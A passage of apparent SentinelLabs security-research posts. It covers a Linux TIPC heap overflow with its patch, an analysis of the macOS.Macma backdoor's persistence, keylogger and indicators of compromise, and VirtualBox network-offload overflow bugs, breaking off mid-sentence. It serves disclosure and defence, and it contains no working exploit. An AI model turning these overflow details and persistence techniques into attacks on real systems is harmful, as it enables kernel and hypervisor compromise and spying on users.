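As a sketch, and assuming the field layout used by the kernel's TIPC header accessors (a 4-bit header-size field stored right-shifted by two, and a 17-bit message size in the low bits of word 0), the two sizes can be unpacked like this:

```python
# Hedged sketch of how the two sizes are unpacked from word 0 of a TIPC
# header, following the field layout in the kernel's net/tipc/msg.h.

def msg_hdr_sz(word0):
    """'Header Size': a 4-bit field at bits 21-24, in units of 4 bytes."""
    return ((word0 >> 21) & 0xF) << 2

def msg_size(word0):
    """'Message Size': the whole message (header included), low 17 bits."""
    return word0 & 0x1FFFF

w0 = (6 << 21) | 40                  # header size 24 bytes, message size 40 bytes
print(msg_hdr_sz(w0), msg_size(w0))  # → 24 40
```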

These two sizes are validated by the tipc_msg_validate function.

bool tipc_msg_validate(struct sk_buff **_skb)
{
  struct sk_buff *skb = *_skb;
  struct tipc_msg *hdr;
  int msz, hsz;

/* ... */

  hsz = msg_hdr_sz(buf_msg(skb));
  if (unlikely(hsz < MIN_H_SIZE) || (hsz > MAX_H_SIZE))
      return false;

/* ... */

  hdr = buf_msg(skb);

/* ... */

  msz = msg_size(hdr);
  if (unlikely(msz < hsz || msz > TIPC_MAX_USER_MSG_SIZE))
      return false;
  if (unlikely(skb->len < msz))
      return false;

  TIPC_SKB_CB(skb)->validated = 1;

  return true;
}
The Message Size is correctly validated as greater than the Header Size, the payload size is validated against the maximum user message size, and the message size is validated against the actual received packet length.

Overview of the TIPC Vulnerability

In September 2020, a new user message type was introduced called MSG_CRYPTO, which allows peers to send cryptographic keys (at the moment, only AES GCM appears to be supported). This is part of the 2021 TIPC roadmap.

The body of the message has the following structure:

 struct tipc_aead_key {
	char alg_name[TIPC_AEAD_ALG_NAME];
	unsigned int keylen; 	/* in bytes */
	char key[];
};
Here, TIPC_AEAD_ALG_NAME is a macro defined as 32. When this message is received, the TIPC kernel module needs to copy this information into storage for that node:

  /* Allocate memory for the key */
  skey = kmalloc(size, GFP_ATOMIC);
/* ... */

  /* Copy key from msg data */
  skey->keylen = ntohl(*((__be32 *)(data + TIPC_AEAD_ALG_NAME)));
  memcpy(skey->alg_name, data, TIPC_AEAD_ALG_NAME);
  memcpy(skey->key, data + TIPC_AEAD_ALG_NAME + sizeof(__be32),

The size used to allocate is the same as the size of the message payload (calculated from the Header Size being subtracted from the Message Size). The name of the key algorithm is copied and the key itself is then copied as well.

As mentioned above, the Header Size and the Message Size are both validated against the actual packet size. So while these values are guaranteed to be within the range of the actual packet, there are no similar checks for either the keylen member of the MSG_CRYPTO message or the size of the key algorithm name itself (TIPC_AEAD_ALG_NAME) against the message size. This means that an attacker can create a packet with a small body size to allocate heap memory, and then use an arbitrary size in the keylen attribute to write outside the bounds of this location:

An example of a MSG_CRYPTO message that triggers the vulnerability
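A short Python sketch makes the flaw concrete. The parser below is illustrative, not kernel code; it enforces the consistency check the vulnerable code lacked (payload size must equal the 32-byte algorithm name, plus the 4-byte keylen field, plus keylen bytes of key):

```python
# Hedged sketch: parse a MSG_CRYPTO body and validate keylen against the
# payload size, the way the eventual patch does. Offsets follow the
# struct tipc_aead_key layout above (TIPC_AEAD_ALG_NAME = 32).

import struct

TIPC_AEAD_ALG_NAME = 32

def parse_msg_crypto(data):
    """Return (alg_name, key) or raise ValueError on inconsistent sizes."""
    if len(data) < TIPC_AEAD_ALG_NAME + 4:
        raise ValueError("body too small to hold a key header")
    (keylen,) = struct.unpack_from(">I", data, TIPC_AEAD_ALG_NAME)
    if len(data) != TIPC_AEAD_ALG_NAME + 4 + keylen:
        # This is the check the vulnerable code skipped until after the copy.
        raise ValueError("keylen inconsistent with payload size")
    alg = data[:TIPC_AEAD_ALG_NAME].rstrip(b"\x00").decode()
    return alg, data[TIPC_AEAD_ALG_NAME + 4:]

# Well-formed body (algorithm name string is illustrative):
good = b"AES-GCM".ljust(32, b"\x00") + struct.pack(">I", 16) + b"K" * 16
print(parse_msg_crypto(good)[0])  # → AES-GCM

# Small body with a huge keylen: the overflow setup in the vulnerable code.
evil = b"AES-GCM".ljust(32, b"\x00") + struct.pack(">I", 0xFFFF) + b"K" * 16
try:
    parse_msg_crypto(evil)
except ValueError as e:
    print("rejected:", e)
```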

Exploitability of CVE-2021-43267

This vulnerability can be exploited both locally and remotely. While local exploitation is easier due to greater control over the objects allocated in the kernel heap, remote exploitation can be achieved thanks to the structures that TIPC supports.

As for the data being overwritten, at first glance it may look like the overflow will have uncontrolled data, since the actual message size used to allocate the heap location is verified. However, a second look at the message validation function shows that it only checks that the message size in the header is within the bounds of the actual packet. That means that an attacker could create a 20 byte packet and set the message size to 10 bytes without failing the check:

	if (unlikely(skb->len < msz))
		return false;

The Patch for CVE-2021-43267

In order to aid in fixing the issue quickly, I drafted a patch idea along with the report. After some very helpful discussion with one person from the Linux Foundation and one of the TIPC maintainers, the following patch was decided on:

 net/tipc/crypto.c | 32 +++++++++++++++++++++-----------
 1 file changed, 21 insertions(+), 11 deletions(-)

 diff --git a/net/tipc/crypto.c b/net/tipc/crypto.c
 index c9391d38d..dc60c32bb 100644
 --- a/net/tipc/crypto.c
 +++ b/net/tipc/crypto.c
 @@ -2285,43 +2285,53 @@ static bool tipc_crypto_key_rcv(struct tipc_crypto *rx, struct tipc_msg *hdr)
 	u16 key_gen = msg_key_gen(hdr);
 	u16 size = msg_data_sz(hdr);
 	u8 *data = msg_data(hdr);
 +	unsigned int keylen;
 +
 +	/* Verify whether the size can exist in the packet */
 +	if (unlikely(size < sizeof(struct tipc_aead_key))) {
 +		pr_debug("%s: message data size is too small\n", rx->name);
 +		goto exit;
 +	}
 +
 +	keylen = ntohl(*((__be32 *)(data + TIPC_AEAD_ALG_NAME)));
 +
 +	/* Verify the supplied size values */
 +	if (unlikely(size != keylen + sizeof(struct tipc_aead_key) ||
 +		     keylen > TIPC_AEAD_KEY_SIZE_MAX)) {
 +		pr_debug("%s: invalid MSG_CRYPTO key size\n", rx->name);
 +		goto exit;
 +	}
 
 	spin_lock(&rx->lock);
 	if (unlikely(rx->skey || (key_gen == rx->key_gen && rx->key.keys))) {
 		pr_err("%s: key existed <%p>, gen %d vs %d\n", rx->name,
 		       rx->skey, key_gen, rx->key_gen);
 -		goto exit;
 +		goto exit_unlock;
 	}
 
 	/* Allocate memory for the key */
 	skey = kmalloc(size, GFP_ATOMIC);
 	if (unlikely(!skey)) {
 		pr_err("%s: unable to allocate memory for skey\n", rx->name);
 -		goto exit;
 +		goto exit_unlock;
 	}
 
 	/* Copy key from msg data */
 -	skey->keylen = ntohl(*((__be32 *)(data + TIPC_AEAD_ALG_NAME)));
 +	skey->keylen = keylen;
 	memcpy(skey->alg_name, data, TIPC_AEAD_ALG_NAME);
 	memcpy(skey->key, data + TIPC_AEAD_ALG_NAME + sizeof(__be32),
 	       skey->keylen);
 
 -	/* Sanity check */
 -	if (unlikely(size != tipc_aead_key_size(skey))) {
 -		kfree(skey);
 -		skey = NULL;
 -		goto exit;
 -	}
 -
 	rx->key_gen = key_gen;
 	rx->skey_mode = msg_key_mode(hdr);
 	rx->skey = skey;
 	rx->nokey = 0;
 	mb(); /* for nokey flag */
 
 -exit:
 +exit_unlock:
 	spin_unlock(&rx->lock);
 +exit:
 	/* Schedule the key attaching on this crypto */
 	if (likely(skey && queue_delayed_work(tx->wq, &rx->work, 0)))
 		return true;
This patch moves the size validation so that it takes place before the copy rather than after it. I’ve also added a size overflow check along with additional checks for the minimum packet size and the supplied key size.


As this vulnerability was discovered within a year of its introduction into the codebase, TIPC users should ensure that their Linux kernel version is not in the affected range of 5.10-rc1 up to, but not including, 5.15.


The vulnerability research that SentinelLabs conducts allows us to protect users on a global scale by identifying and fixing vulnerabilities before malicious actors do. In the case of TIPC, the vulnerability was caught within a year of its introduction into the codebase. While TIPC itself isn’t loaded automatically by the system but by end users, the ability to configure it from an unprivileged local perspective and the possibility of remote exploitation makes this a dangerous vulnerability for those that use it in their networks. What is more concerning is that an attacker that exploits this vulnerability could execute arbitrary code within the kernel, leading to a complete compromise of the system.

Disclosure Timeline

19 Oct 2021 - SentinelLabs supplied the initial vulnerability report to the team
19 Oct 2021 - Greg K.H. responds and adds the TIPC maintainers to the email thread
21 Oct 2021 - The patch is finalised
25 Oct 2021 - The patch is added to
29 Oct 2021 - The patch is added to the mainline repository
31 Oct 2021 - The patch is now officially under 5.15
04 Nov 2021 - SentinelLabs publicly disclose details of the vulnerability

Infect If Needed | A Deeper Dive Into Targeted Backdoor macOS.Macma

15 November 2021 at 18:41

Last week, Google’s Threat Analysis Group published details around what appears to be APT activity targeting, among others, Mac users visiting Hong Kong websites supporting pro-democracy activism. Google’s report focused on the use of two vulnerabilities: a zero day and a N-day (a known vulnerability with an available patch).

By the time of Google’s publication both had, in fact, been patched for some months. What received less attention was the malware that the vulnerabilities were leveraged to drop: a backdoor that works just fine even on the latest patched systems of macOS Monterey.

Google labelled the backdoor “Macma”, and we will follow suit. Shortly after Google’s publication, a rapid triage of the backdoor was published by Objective-See (under the name “OSX.CDDS”). In this post, we take a deeper dive into macOS.Macma, reveal further IoCs to aid defenders and threat hunters, and speculate on some of macOS.Macma’s (hitherto-unmentioned) interesting artifacts.

How macOS.Macma Gains Persistence

Thanks to the work of Google’s TAG team, we were able to grab two versions of the backdoor used by the threat actors, which we will label UserAgent 2019 and UserAgent 2021. Both are interesting, but arguably the earlier 2019 version has greater longevity since the delivery mechanism appears to work just fine on macOS Monterey.

The 2019 version of macOS.Macma will run just fine on macOS Monterey

UserAgent 2019 is a Mach-O binary dropped by an application called “”, itself contained in a .DMG file (the disk image sample found by Google has the name “install_flash_player_osx.dmg”). UserAgent 2021 is a standalone Mach-O binary and contains much the same functionality as the 2019 version along with some added AV capture capabilities. This version of macOS.Macma is installed by a separate Mach-O binary dropped when the threat actors leverage the vulnerabilities described in Google’s post.

Both versions install the same persistence agent, in the current user’s ~/Library/LaunchAgents folder.

Macma’s persistence agent,

The property list is worth pausing over as it contains some interesting features. First, aside from the path to the executable, we can see that the persistence agent passes two arguments to the malware before it is run: -runMode, and ifneeded.

The agent also switches the current working directory to a custom folder, in which later will be deposited data from the separate keylogger module, among other things.

We find it interesting that the developer chose to include the LimitLoadToSessionType key with the value “Aqua”. The “Aqua” value ensures the LaunchAgent only runs when there is a logged in GUI user (as opposed to running as a background task or running when a user logs in via SSH). This is likely necessary to ensure other functionality, such as requesting that the user gives access to the Microphone and Accessibility features.

Victims are prompted to allow macOS.Macma access to the Microphone

However, since launchd defaults to “Aqua” when no key is specified at all, this inclusion is rather redundant. We might speculate that the inclusion of the key here suggests the developer is familiar with developing other LaunchAgents in other contexts where other keys are indeed necessary.
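A reconstruction sketch of such a LaunchAgent, based on the behaviors described above, can be rendered with Python's `plistlib`. The label and paths here are illustrative, not a byte-for-byte copy of Macma's plist:

```python
# Hedged reconstruction of a LaunchAgent that passes arguments, sets a
# working directory, and pins the job to GUI sessions via "Aqua".
# Label and paths are illustrative stand-ins, not Macma's actual values.

import plistlib

agent = {
    "Label": "com.UserAgent.va",                            # illustrative label
    "ProgramArguments": [
        "/Users/victim/Library/Preferences/lib/UserAgent",  # illustrative path
        "-runMode", "ifneeded",
    ],
    "WorkingDirectory": "/Users/victim/Library/Preferences/lib",
    "LimitLoadToSessionType": "Aqua",   # redundant: Aqua is launchd's default
    "RunAtLoad": True,
    "KeepAlive": True,
}

# plistlib renders the XML property list launchd would consume:
xml = plistlib.dumps(agent).decode()
print("LimitLoadToSessionType" in xml and "Aqua" in xml)  # → True
```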

Application Bundle Confusion Suggests A “Messy” Development Process

Since we are discussing property lists, there are some interesting artifacts in the app bundle’s Info.plist, and these in turn led us to notice a number of other oddities in the bundle executables.

One of the great things about finding malware built into a bundle with an Info.plist is it gives away some interesting details about when, and on what machine, the malware was built.

macOS.Macma was built on El Capitan

In this case, we see the malware was built on an El Capitan machine running build 15C43. That’s curious, because build 15C43 was never a public release build: it was a beta of El Capitan 10.11.2 available to developers and AppleSeed (Apple beta testers) briefly around October to November 2015. On December 8th, 2015, El Capitan 10.11.2 was released with build number 15C50, superseding the previous public release of 10.11.1, build 15B42 from October 21st.

At this juncture, let’s note that the malware was signed with an ad hoc signature, meaning it did not require an Apple Developer account or ID to satisfy code signing requirements.

Therein lies an anomaly: the bundle was signed without needing a developer account, but it seems that the macOS version used to create this version of macOS.Macma was indeed sourced from a developer account. Such an account could possibly belong to the author(s), possibly be stolen, or possibly have been acquired with a fake ID. However, the latter two scenarios seem inconsistent with the ad hoc signature. If the developer had a fake or stolen Apple ID, why not codesign the malware with it for added credibility?

While we’re speculating about the developer or developers’ identities, two other artifacts in the bundle are worthy of mention. The main executable in ../MacOS is called “SafariFlashActivity” and was apparently compiled on Sept 16th, 2019. In the ../Resources folder, we see what appears to be an earlier version of the executable, “SafariFlashActivity1”, built some nine days earlier on Sept 7th.

While these two executables share a large amount of code and functionality, there are also a number of differences between them. Perhaps the most intriguing are that they appear – by accident or by design – to have been created by two entirely different users.

User strings from two binaries in the same macOS.Macma bundle

The user account “lifei” (speculatively, Li Fei, a common-enough Chinese name) seems to have replaced the user account “lxk”. Of course, it could be the same person operating different user accounts, or two entirely different individuals building separately from a common project. Indeed, there are sufficiently large differences in the code in such a short space of time to make it plausible that two developers were working independently on the same project and that one’s build was chosen over the other’s for the final executable embedded in the ../MacOS folder.

Note that in the “lifei” builds, we see both the use of “Mac_Ma” for the first time, and “preexcel” — used as the team identifier in the final code signature. Neither of these appear in the “lxk” build, where “SafariFlashActivity” appears to be the project name. This bifurcation even extends to an unusual inconsistency between the identifier used in the bundle and that used in the code signature, where one is xxxxx.SafariFlashActivity and the other is xxxxxx.preexcl-project.

Inconsistent identifiers used in the bundle and code signature of macOS.Macma

In any case, the string “lifei” is found in several of the other binaries in the 2019 version of macOS.Macma, whereas “lxk” is not seen again. In the 2021 version, both “lifei” and “lxk” and all other developer artifacts have disappeared entirely from both the installer and UserAgent binaries, suggesting that the development process had been deliberately cleaned up.

User lifei’s “Macma” seems to have won the ‘battle of the devs’

Finally, if we return to the various (admittedly, falsifiable) compilation dates found in the bundle, there is another curiosity: we noted that the malware appears to have been compiled on a 2015 developer build of macOS, yet the Info.plist has a copyright date of 2018, and the executables in this bundle were built well over three years later, in September 2019, according to the (entirely manipulatable) timestamps.

What can we conclude from all these tangled weeds? Nothing concrete, admittedly. But there do seem to be two plausible, if competing, narratives: perhaps the threat actor went to extraordinary, and likely unnecessary, lengths to muddle the artifacts in these binaries. Alternatively, the threat actor had a somewhat confused development process with more than one developer and changing requirements. No doubt the truth is far more complex, but given the nature of the artifacts above, we suspect the latter may well be at least part of the story.

For defenders, all this provides a plethora of collectible artifacts that may, perhaps, help us to identify this malware or track this threat actor in future incidents.

macOS.Macma – Links To Android and Linux Malware?

Things start to get even more interesting when we take a look at artifacts in the executable code itself. As we noted in the introduction, an early report on this malware dubbed it “OSX.CDDS”. We can see why. The code is littered with methods prefixed with CDDS.

Some of the CDDS methods found in the 2021 UserAgent executable

That code, according to Google TAG, is an implementation of a DDS – Data Distribution Service – framework. While our searches turned up blank trying to find a specific implementation of DDS that matched the functions used in macOS.Macma, we did find other malware that uses the same framework.

Android malware drops an ELF bin that contains the same CDDS framework

Links to known Android malware droppers

These ELF bins and both versions of macOS.Macma’s UserAgent also share another commonality, the strings “Octstr2Dec” and “Dec2Octstr”.

Commonalities between macOS.Macma and a malicious ELF Shared object file

These latter strings, which appear to be conversions for strings containing octals and decimals, may simply be a matter of coincidence or of code reuse. The code similarities we found also have links back to installers for the notorious Shedun Android malware.

In their report, Google’s TAG pointed out that macOS.Macma was associated with an iOS exploit chain that they had not been able to entirely recover. Our analysis suggests that the actors behind macOS.Macma at least were reusing code from ELF/Android developers and possibly could have also been targeting Android phones with malware as well. Further analysis is needed to see how far these connections extend.

Macma’s Keylogger and AV Capture Functionality

While the earlier reports referred to above have already covered the basics of macOS.Macma functionality, we want to expand on previous reporting to reveal further IoCs.

As previously mentioned, macOS.Macma will drop a persistence agent at ~/Library/LaunchAgents/ and an executable at ~/Library/Preferences/lib/UserAgent.

As we noted above, the LaunchAgent will ensure that before the job starts, the executable’s current working directory will be changed to the aforementioned “lib” folder. This folder is used as a repository for data culled by the keylogger, “kAgent”, which itself is dropped at ~/Library/Preferences/Tools/, along with the “at” and “arch” Mach-O binaries.

Binaries dropped by macOS.Macma

The kAgent keylogger creates text files of captured keystrokes from any text input field, including Spotlight, Finder, Safari, Mail, Messages and other apps that have text fields for passwords and so on. The text files are created with Unix timestamps for names and collected in directories called “data”.
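For hunters, this artifact pattern is easy to sweep for. The sketch below (illustrative matching, not SentinelOne detection logic) flags files whose names are ten-digit Unix timestamps sitting inside directories named “data”:

```python
# Hedged hunting sketch: walk a directory tree for files whose names look
# like Unix timestamps inside a directory named "data", matching the
# keylogger artifact pattern described above.

import os
import re
import tempfile

TS_NAME = re.compile(r"^\d{10}$")  # e.g. 1636804188

def find_keylog_artifacts(root):
    """Return paths of timestamp-named files inside any 'data' directory."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) == "data":
            hits += [os.path.join(dirpath, f) for f in files if TS_NAME.match(f)]
    return hits

# Demo against a throwaway tree:
root = tempfile.mkdtemp()
os.makedirs(os.path.join(root, "lib", "data"))
open(os.path.join(root, "lib", "data", "1636804188"), "w").close()
open(os.path.join(root, "lib", "data", "notes.txt"), "w").close()
print([os.path.basename(p) for p in find_keylog_artifacts(root)])  # → ['1636804188']
```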

The file 1636804188 contains data captured by the keylogger

We also note that this malware reaches out to a remote .php file to return the user’s IP address. The same URL has a long history of use.

Both Android and macOS malware ping this URL

Finally, one further IoC we noted in the ../MacOS/SafariFlashActivity “lifei” binary that never appeared anywhere else, and we also did not see dropped on any of our test runs, was:

Malware tries to drop a file in the Safari folder

This is worth mentioning since the target folder, the User’s Library/Safari folder, has been TCC protected since Mojave. For that reason, any attempt to install there would fall afoul of current TCC protections (bypasses notwithstanding). It looks, therefore, like a remnant of earlier code development from the El Capitan era, and indeed we do not see this string in later versions. However, it’s unique enough for defenders to watch out for: there’s never any legitimate reason for an executable at this path to exist on any version of macOS.


Catching APTs targeting macOS users is a rare event, and we are lucky in this instance to have a fairly transparent view of the malware being dropped. Regardless of the vector used to drop the malware, the payload itself is perfectly functional and capable of exfiltrating data and spying on macOS users. It’s just another reminder, if one were needed, that simply investing in a Mac does not guarantee you safe passage against bad actors. This may have been an APT-developed payload, but the code is simple enough for anyone interested in malfeasance to reproduce.

Indicators of Compromise

000830573ff24345d88ef7916f9745aff5ee813d; UserAgent 2021 payload, Mach-O
07f8549d2a8cc76023acee374c18bbe31bb19d91; UserAgent 2019, Mach-O
0e7b90ec564cb3b6ea080be2829b1a593fff009f; (Related) ELF DYN Shared object file
2303a9c0092f9b0ccac8536419ee48626a253f94; UserAgent 2021 installer, Mach-O
31f0642fe76b2bdf694710a0741e9a153e04b485; SafariFlashActivity1, Mach-O
734070ae052939c946d096a13bc4a78d0265a3a2; (Related) ELF DYN Shared object file
77a86a6b26a6d0f15f0cb40df62c88249ba80773; at, Mach-O
941e8f52f49aa387a315a0238cff8e043e2a7222; install_flash_player_osx.dmg, DMG
b2f0dae9f5b4f9d62b73d24f1f52dcb6d66d2f52; client, Mach-O
b6a11933b95ad1f8c2ad97afedd49a188e0587d2; SafariFlashActivity, Mach-O
c4511ad16564eabb2c179d2e36f3f1e59a3f1346; arch, Mach-O
f7549ff73f9ce9f83f8181255de7c3f24ffb2237; SafariFlashActivityInstall, shell script

File Paths


GSOh No! Hunting for Vulnerabilities in VirtualBox Network Offloads

23 November 2021 at 11:56


The Pwn2Own contest is like Christmas for me. It’s an exciting competition which involves rummaging around to find critical vulnerabilities in the most commonly used (and often the most difficult) software in the world. Back in March, I was preparing to have a pop at the Vancouver contest and had decided to take a break from writing browser fuzzers to try something different: VirtualBox.

Virtualization is an incredibly interesting target. The complexity involved in both emulating hardware devices and passing data safely to real hardware is astounding. And as the mantra goes: where there is complexity, there are bugs.

For Pwn2Own, it was a safe bet to target an emulated component. In my eyes, network hardware emulation seemed like the right (and usual) route to go. I started with a default component: the NAT emulation code in /src/VBox/Devices/Network/DrvNAT.cpp.

At the time, I just wanted to get a feel for the code, so there was no specific methodical approach to this other than scrolling through the file and reading various parts.

During my scrolling adventure, I landed on something that caught my eye:

#if 0 /* Assertion happens often to me after resuming a VM -- no time to investigate this now. */
    Assert(pThis->enmLinkState == PDMNETWORKLINKSTATE_UP);
#endif
    if (pThis->enmLinkState == PDMNETWORKLINKSTATE_UP)
    {
        struct mbuf *m = (struct mbuf *)pSgBuf->pvAllocator;
        if (m)
        {
            /*
             * A normal frame.
             */
            pSgBuf->pvAllocator = NULL;
            slirp_input(pThis->pNATState, m, pSgBuf->cbUsed);
        }
        else
        {
            /*
             * GSO frame, need to segment it.
             */
            /** @todo Make the NAT engine grok large frames?  Could be more efficient... */
#if 0 /* this is for testing PDMNetGsoCarveSegmentQD. */
            uint8_t         abHdrScratch[256];
#endif
            uint8_t const  *pbFrame = (uint8_t const *)pSgBuf->aSegs[0].pvSeg;
            PCPDMNETWORKGSO pGso    = (PCPDMNETWORKGSO)pSgBuf->pvUser;
            uint32_t const  cSegs   = PDMNetGsoCalcSegmentCount(pGso, pSgBuf->cbUsed);  Assert(cSegs > 1);
            for (uint32_t iSeg = 0; iSeg < cSegs; iSeg++)
            {
                size_t cbSeg;
                void  *pvSeg;
                m = slirp_ext_m_get(pThis->pNATState, pGso->cbHdrsTotal + pGso->cbMaxSeg, &pvSeg, &cbSeg);
                if (!m)
                    break;
#if 1
                uint32_t cbPayload, cbHdrs;
                uint32_t offPayload = PDMNetGsoCarveSegment(pGso, pbFrame, pSgBuf->cbUsed,
                                                            iSeg, cSegs, (uint8_t *)pvSeg, &cbHdrs, &cbPayload);
                memcpy((uint8_t *)pvSeg + cbHdrs, pbFrame + offPayload, cbPayload);
                slirp_input(pThis->pNATState, m, cbPayload + cbHdrs);

The function used for sending packets from the guest to the network contained a separate code path for Generic Segmentation Offload (GSO) frames and was using memcpy to combine pieces of data.

The next question was of course “How much of this can I control?” After going through various code paths and writing a simple Python-based constraint solver for all the limiting factors, the answer turned out to be “more than I expected”, at least when using the paravirtualized network device, VirtIO.

Paravirtualized Networking

An alternative to fully emulating a device is to use paravirtualization. Unlike full virtualization, in which the guest is entirely unaware that it is a guest, paravirtualization has the guest install drivers that are aware that they are running in a guest machine in order to work with the host to transfer data in a much faster and more efficient manner.

VirtIO is an interface that can be used to develop paravirtualized drivers. One such driver is virtio-net, which comes with the Linux source and is used for networking. VirtualBox, like a number of other virtualization software, supports this as a network adapter:

The Adapter Type options

Similarly to the e1000, VirtIO networking works by using ring buffers to transfer data between the guest and the host (in this case called Virtqueues, or VQueues). However, unlike the e1000, VirtIO doesn’t use a single ring with head and tail registers for transmitting, but instead uses three separate arrays:

  • A Descriptor array that contains the following data per-descriptor:
    • Address – The physical address of the data being transferred.
    • Length – The length of data at the address.
    • Flags – Flags that determine whether the Next field is in-use and whether the buffer is read or write.
    • Next – Used when there is chaining.
  • An Available ring – An array that contains indexes into the Descriptor array that are in use and can be read by the host.
  • A Used ring – An array of indexes into the Descriptor array that have been read by the host.

This looks as so:

When the guest wishes to send packets to the network, it adds an entry to the descriptor table, adds the index of this descriptor to the Available ring, and then increments the Available Index pointer:

Once this is done, the guest ‘kicks’ the host by writing the VQueue index to the Queue Notify register. This triggers the host to begin handling descriptors in the available ring. Once a descriptor has been processed, it is added to the Used ring and the Used Index is incremented:
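For reference, the three arrays can be sketched as C structs. This is a simplified layout following the generic VirtIO specification; the names below are the spec’s generic ones, not VirtualBox’s internal types:

```c
#include <stdint.h>

/* One entry in the Descriptor array. */
struct virtq_desc {
    uint64_t addr;   /* guest-physical address of the data buffer */
    uint32_t len;    /* length of the data at addr */
    uint16_t flags;  /* NEXT (chaining) and WRITE (direction) bits */
    uint16_t next;   /* index of the next descriptor when chained */
};

/* Available ring: descriptor indexes published by the guest. */
struct virtq_avail {
    uint16_t flags;
    uint16_t idx;     /* incremented by the guest after adding entries */
    uint16_t ring[];  /* indexes into the descriptor array */
};

/* Used ring: descriptor chains the host has finished processing. */
struct virtq_used_elem {
    uint32_t id;   /* head index of a processed descriptor chain */
    uint32_t len;  /* bytes the host wrote into the chain */
};

struct virtq_used {
    uint16_t flags;
    uint16_t idx;  /* incremented by the host after consuming entries */
    struct virtq_used_elem ring[];
};
```

When the guest kicks the host, the host walks every index from its last-seen position up to the Available `idx`, processes the referenced descriptors, and appends corresponding entries to the Used ring.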

Generic Segmentation Offload

Next, some background on GSO is required. To understand the need for GSO, it’s important to understand the problem that it solves for network cards.

Originally, the CPU handled all of the heavy lifting: calculating transport-layer checksums and segmenting large blocks of data into smaller Ethernet-sized packets. Since this process can be quite slow when dealing with a lot of outgoing network traffic, hardware manufacturers started implementing offloading for these operations, removing the strain from the operating system.

For segmentation, this meant that instead of the OS having to pass a number of much smaller packets through the network stack, the OS just passes a single packet once.

It was noticed that this optimization could be applied to other protocols (beyond TCP and UDP) without the need for hardware support by delaying segmentation until just before the network driver receives the message. This is how GSO came about.

Since VirtIO is a paravirtualized device, the driver is aware that it is in a guest machine and so GSO can be applied between the guest and host. GSO is implemented in VirtIO by adding a context descriptor header to the start of the network buffer. This header can be seen in the following struct:

struct VNetHdr
{
    uint8_t  u8Flags;
    uint8_t  u8GSOType;
    uint16_t u16HdrLen;
    uint16_t u16GSOSize;
    uint16_t u16CSumStart;
    uint16_t u16CSumOffset;
};

The VirtIO header can be thought of as a similar concept to the Context Descriptor in e1000.

When this header is received, the parameters are verified for some level of validity in vnetR3ReadHeader. Then the function vnetR3SetupGsoCtx is used to fill the standard GSO struct used by VirtualBox across all network devices:

typedef struct PDMNETWORKGSO
{
    /** The type of segmentation offloading we're performing (PDMNETWORKGSOTYPE). */
    uint8_t             u8Type;
    /** The total header size. */
    uint8_t             cbHdrsTotal;
    /** The max segment size (MSS) to apply. */
    uint16_t            cbMaxSeg;
    /** Offset of the first header (IPv4 / IPv6).  0 if not not needed. */
    uint8_t             offHdr1;
    /** Offset of the second header (TCP / UDP).  0 if not not needed. */
    uint8_t             offHdr2;
    /** The header size used for segmentation (equal to offHdr2 in UFO). */
    uint8_t             cbHdrsSeg;
    /** Unused. */
    uint8_t             u8Unused;
} PDMNETWORKGSO;

Once this has been constructed, the VirtIO code creates a scatter-gatherer to assemble the frame from the various descriptors:

            /* Assemble a complete frame. */
            for (unsigned int i = 1; i < elem.nOut && uSize > 0; i++)
            {
                unsigned int cbSegment = RT_MIN(uSize, elem.aSegsOut[i].cb);
                PDMDevHlpPhysRead(pDevIns, elem.aSegsOut[i].addr,
                                  ((uint8_t*)pSgBuf->aSegs[0].pvSeg) + uOffset,
                                  cbSegment);
                uOffset += cbSegment;
                uSize -= cbSegment;
            }

The frame is passed to the NAT code along with the new GSO structure, reaching the point that drew my interest originally.

Vulnerability Analysis

CVE-2021-2145 – Oracle VirtualBox NAT Integer Underflow Privilege Escalation Vulnerability

When the NAT code receives the GSO frame, it gets the full ethernet packet and passes it to Slirp (a library for TCP/IP emulation) as an mbuf message. In order to do this, VirtualBox allocates a new mbuf message and copies the packet to it. The allocation function takes a size and picks the next largest allocation size from three distinct buckets:

  1. MCLBYTES (0x800 bytes)
  2. MJUM9BYTES (0x2400 bytes)
  3. MJUM16BYTES (0x4000 bytes)
struct mbuf *slirp_ext_m_get(PNATState pData, size_t cbMin, void **ppvBuf, size_t *pcbBuf)
{
    struct mbuf *m;
    int size = MCLBYTES;
    LogFlowFunc(("ENTER: cbMin:%d, ppvBuf:%p, pcbBuf:%p\n", cbMin, ppvBuf, pcbBuf));

    if (cbMin < MCLBYTES)
        size = MCLBYTES;
    else if (cbMin < MJUM9BYTES)
        size = MJUM9BYTES;
    else if (cbMin < MJUM16BYTES)
        size = MJUM16BYTES;
    else
        AssertMsgFailed(("Unsupported size"));

If the supplied size is larger than MJUM16BYTES, an assertion is triggered. Unfortunately, this assertion is only compiled when the RT_STRICT macro is used, which is not the case in release builds. This means that execution will continue after this assertion is hit, resulting in a bucket size of 0x800 being selected for the allocation. Since the actual data size is larger, this results in a heap overflow when the user data is copied into the mbuf.

/** @def AssertMsgFailed
 * An assertion failed print a message and a hit breakpoint.
 * @param   a   printf argument list (in parenthesis).
 */
#ifdef RT_STRICT
# define AssertMsgFailed(a)  \
    do { \
        RTAssertMsg1Weak((const char *)0, __LINE__, __FILE__, RT_GCC_EXTENSION __PRETTY_FUNCTION__); \
        RTAssertMsg2Weak a; \
        RTAssertPanic(); \
    } while (0)
#else
# define AssertMsgFailed(a)     do { } while (0)
#endif
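Putting the macro and the allocator together, the failure mode reduces to a few lines. The following is a simplified sketch of the bucket selection described above as it behaves in a release build (where RT_STRICT is undefined), not VirtualBox’s exact code:

```c
#include <assert.h>
#include <stddef.h>

#define MCLBYTES    0x800
#define MJUM9BYTES  0x2400
#define MJUM16BYTES 0x4000

/* Release build: the assertion macro expands to nothing. */
#define AssertMsgFailed(a) do { } while (0)

/* Returns the mbuf bucket size chosen for an allocation of cbMin bytes. */
static int pick_bucket(size_t cbMin)
{
    int size = MCLBYTES;
    if (cbMin < MCLBYTES)
        size = MCLBYTES;
    else if (cbMin < MJUM9BYTES)
        size = MJUM9BYTES;
    else if (cbMin < MJUM16BYTES)
        size = MJUM16BYTES;
    else
        AssertMsgFailed(("Unsupported size")); /* no-op: size stays 0x800 */
    return size;
}
```

A request larger than MJUM16BYTES therefore silently falls through with `size` still at its initial 0x800, and the subsequent copy of the full frame overflows the 0x800-byte mbuf.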

CVE-2021-2310 - Oracle VirtualBox NAT Heap-based Buffer Overflow Privilege Escalation Vulnerability

Throughout the code, a function called PDMNetGsoIsValid is used which verifies whether the GSO parameters supplied by the guest are valid. However, whenever it is used it is placed in an assertion. For example:

